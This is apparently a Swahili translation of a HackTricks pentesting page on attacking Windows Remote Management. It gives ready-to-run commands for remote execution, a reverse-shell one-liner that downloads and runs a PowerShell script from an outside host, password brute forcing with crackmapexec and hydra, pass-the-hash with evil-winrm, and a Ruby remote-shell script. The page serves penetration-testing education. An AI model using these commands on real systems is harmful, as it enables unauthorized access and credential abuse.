Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

5985,5986 - Pentesting WinRM

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!

Machapisho ya Udukuzi Shiriki na yaliyomo yanayochimba kina cha msisimko na changamoto za udukuzi

Taarifa za Udukuzi za Muda Halisi Kaa sasa na ulimwengu wa udukuzi wenye kasi kupitia taarifa za muda halisi na ufahamu

Matangazo ya Karibuni Baki mwelekezwa na tuzo mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!

WinRM

Udhibiti wa Mbali wa Windows (WinRM) unasisitizwa kama itifaki na Microsoft inayowezesha udhibiti wa mbali wa mifumo ya Windows kupitia HTTP(S), ikiboresha SOAP katika mchakato. Kimsingi inategemea WMI, ikijitambulisha kama kiolesura kinachotumia HTTP kwa shughuli za WMI.

Kuwepo kwa WinRM kwenye mashine inaruhusu usimamizi rahisi wa mbali kupitia PowerShell, kama jinsi SSH inavyofanya kazi kwa mifumo mingine ya uendeshaji. Ili kubaini ikiwa WinRM inafanya kazi, ni vyema kuchunguza ufunguzi wa bandari maalum:

  • 5985/tcp (HTTP)

  • 5986/tcp (HTTPS)

Bandari iliyofunguliwa kutoka orodha hapo juu inaashiria kuwa WinRM imeanzishwa, hivyo kuruhusu jaribio la kuanzisha kikao cha mbali.

Kuanzisha Kikao cha WinRM

Ili kusanidi PowerShell kwa WinRM, amri ya Microsoft Enable-PSRemoting inatumika, kuweka kompyuta kukubali amri za PowerShell za mbali. Kwa ufikiaji wa PowerShell ulioinuliwa, amri zifuatazo zinaweza kutekelezwa ili kuwezesha hii na kuweka mwenyeji yeyote kuwa wa kuaminika:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *

Hii njia inahusisha kuongeza kibambo kwenye usanidi wa trustedhosts, hatua inayohitaji kuzingatia kwa uangalifu kutokana na matokeo yake. Pia imebainika kwamba kubadilisha aina ya mtandao kutoka "Umma" hadi "Kazi" inaweza kuwa muhimu kwenye mashine ya mshambuliaji.

Zaidi ya hayo, WinRM inaweza kuamilishwa kijijini kwa kutumia amri ya wmic, kama inavyodhihirishwa hapa:

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

Hii njia inaruhusu usanidi wa mbali wa WinRM, ikiboresha uwezo wa kusimamia mashine za Windows kutoka mbali.

Jaribu ikiwa imesanidiwa

Ili kuthibitisha usanidi wa mashine yako ya mashambulizi, amri ya Test-WSMan hutumiwa kuangalia ikiwa lengo lina WinRM imesanidiwa ipasavyo. Kwa kutekeleza amri hii, unapaswa kutarajia kupokea maelezo kuhusu toleo la itifaki na wsmid, ikionyesha usanidi uliofanikiwa. Hapa chini ni mifano inayoonyesha matokeo yanayotarajiwa kwa lengo lililosanidiwa ikilinganishwa na moja isiyosanidiwa:

  • Kwa lengo ambalo lime sanidiwa ipasavyo, matokeo yatafanana na haya:

Test-WSMan <target-ip>

Kutekeleza amri

Kutekeleza ipconfig kijijini kwenye mashine ya lengo na kuona matokeo yake fanya:

Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]

Unaweza pia kutekeleza amri ya konsoli yako ya sasa ya PS kupitia Invoke-Command. Fikiria kwamba una kazi iitwayo enumeration kwenye kompyuta yako na unataka kuitekeleza kwenye kompyuta ya mbali, unaweza kufanya hivi:

Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]

Tekeleza Skripti

Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]

Pata ganda la nyuma

Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}

Pata kikao cha PS

Ili kupata kabati la PowerShell la kuingiliana tumia Ingia-KikaoPS:

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)

# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)

Kikao kitakimbia katika mchakato mpya (wsmprovhost) ndani ya "mlemavu"

Kulazimisha WinRM Iwe Wazi

Ili kutumia PS Remoting na WinRM lakini kompyuta haijasanidiwa, unaweza kuwezesha kwa:

.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"

Kuhifadhi na Kurudisha vikao

Hii haitafanya kazi ikiwa lugha imekuwa zuiliwa kwenye kompyuta ya mbali.

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)

#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1

Ndani ya vikao hivi unaweza kupakia skripti za PS kwa kutumia Invoke-Command

Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1

Makosa

Ikiwa unapata kosa lifuatalo:

enter-pssession : Kukutana na seva ya mbali 10.10.10.175 ilishindikana na ujumbe wa kosa ufuatao: Mteja wa WinRM hawezi kusindika ombi. Ikiwa mpangilio wa uthibitishaji ni tofauti na Kerberos, au ikiwa kompyuta ya mteja haijaunganishwa kwenye kikoa, basi usafirishaji wa HTTPS lazima utumiwe au mashine ya marudio lazima iongezwe kwenye mpangilio wa usanidi wa TrustedHosts. Tumia winrm.cmd kuweka TrustedHosts. Kumbuka kuwa kompyuta kwenye orodha ya TrustedHosts huenda zisithibitishwe. Unaweza kupata maelezo zaidi kuhusu hilo kwa kukimbia amri ifuatayo: winrm help config. Kwa maelezo zaidi, angalia mada ya Msaada kuhusu Kutatua Matatizo ya Mbali.

Jaribu kwenye mteja (taarifa kutoka hapa):

winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'

Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za makosa ya programu!

Machapisho ya Kudukua Shiriki na yaliyomo yanayochimba kina katika msisimko na changamoto za kudukua

Taarifa za Kudukua Halisi Kaa sasa na ulimwengu wa kudukua wenye kasi kupitia taarifa za wakati halisi na ufahamu

Matangazo ya Karibuni Baki mwelewa na tuzo mpya za makosa ya programu zinazoanzishwa na sasisho muhimu za jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!

Uunganisho wa WinRM kwenye linux

Kuvunja Nguvu

Jihadhari, kuvunja nguvu winrm inaweza kuzuia watumiaji.

#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm

Kutumia evil-winrm

gem install evil-winrm

Soma nyaraka kwenye github yake: https://github.com/Hackplayers/evil-winrm

evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>

Pita hash na evil-winrm

Ili kutumia evil-winrm kuunganisha kwenye anwani ya IPv6 unda kuingilio ndani ya /etc/hosts ukiweka jina la uwanja kwa anwani ya IPv6 na uunganishe kwenye uwanja huo.

evil-winrm -u <username> -H <Hash> -i <IP>

Kutumia mashine ya PS-docker

docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds

Kutumia skripti ya ruby

Msimbo umeondolewa hapa: https://alamot.github.io/winrm_shell/

require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/


conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)


class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end


command=""
file_manager = WinRM::FS::FileManager.new(conn)


conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end

Shodan

  • port:5985 Microsoft-HTTPAPI

Marejeo

Amri za Kiotomatiki za HackTricks

Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
Port_Number:  5985     #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment        #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.

sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’

https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/

ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory        or -s to upload scripts (sherlock)
menu
invoke-binary `tab`

#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))

https://book.hacktricks.xyz/pentesting/pentesting-winrm

Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}

Jiunge na HackenProof Discord server ili kuingiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za makosa ya usalama!

Machapisho ya Kudukua Shiriki na yaliyomo yanayochimba kina katika msisimko na changamoto za kudukua

Taarifa za Kudukua za Muda Halisi Kaa sasa na ulimwengu wa kudukua wenye kasi kupitia taarifa za muda halisi na ufahamu

Matangazo Mapya Baki mwelewa na tuzo mpya za makosa ya usalama zinazoanzishwa na sasisho muhimu za jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!

Jifunze kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Previous5984,6984 - Pentesting CouchDBNext5985,5986 - Pentesting OMI

Last updated